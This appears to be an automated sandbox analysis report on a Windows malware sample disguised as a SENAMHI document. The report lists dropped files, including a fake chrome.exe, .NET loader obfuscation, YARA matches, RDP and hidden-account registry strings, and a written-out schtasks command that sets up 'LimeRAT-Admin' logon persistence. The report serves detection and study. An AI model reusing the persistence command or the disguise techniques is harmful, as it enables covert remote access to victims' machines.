                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
                      Source: Binary string: wuser32.pdbUGP source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: Chrome[1].exe.1.dr, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: wtqsCpda..exe.1.dr, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: chrome.exe.15.dr, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.0.wtqsCpda..exe.540000.2.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.0.wtqsCpda..exe.540000.1.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.0.wtqsCpda..exe.540000.0.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.2.wtqsCpda..exe.540000.0.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 18.2.chrome.exe.760000.0.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 18.0.chrome.exe.760000.0.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 19.0.chrome.exe.a20000.0.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 19.2.chrome.exe.a20000.0.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 19.0.chrome.exe.a20000.1.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 19.0.chrome.exe.a20000.2.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 19.0.chrome.exe.a20000.3.unpack, ?????????/???????????.cs.Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BE01B1 push ecx; ret 1_2_00BE01C4
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_00544C79 push ss; ret 15_2_00544C7E
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293F1F8 push esp; ret 15_2_0293F1F9
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293F99C push 0000003Bh; ret 15_2_0293F9AF
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293F9D5 push 0000003Bh; ret 15_2_0293F9DD
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 18_2_00764C79 push ss; ret 18_2_00764C7E
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 19_2_00A24C79 push ss; ret 19_2_00A24C7E
                      Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                      Source: mozglue.dll.1.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Temp\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Temp\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Temp\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Temp\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Roaming\wtqsCpda..exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\IconLib.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Temp\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeFile created: C:\Users\user\AppData\Local\Temp\msvcp140.dllJump to dropped file

                      Boot Survival

                      barindex
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeFile opened: C:\Users\user\AppData\Local\Temp\chrome.exe:Zone.Identifier read attributes | delete
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
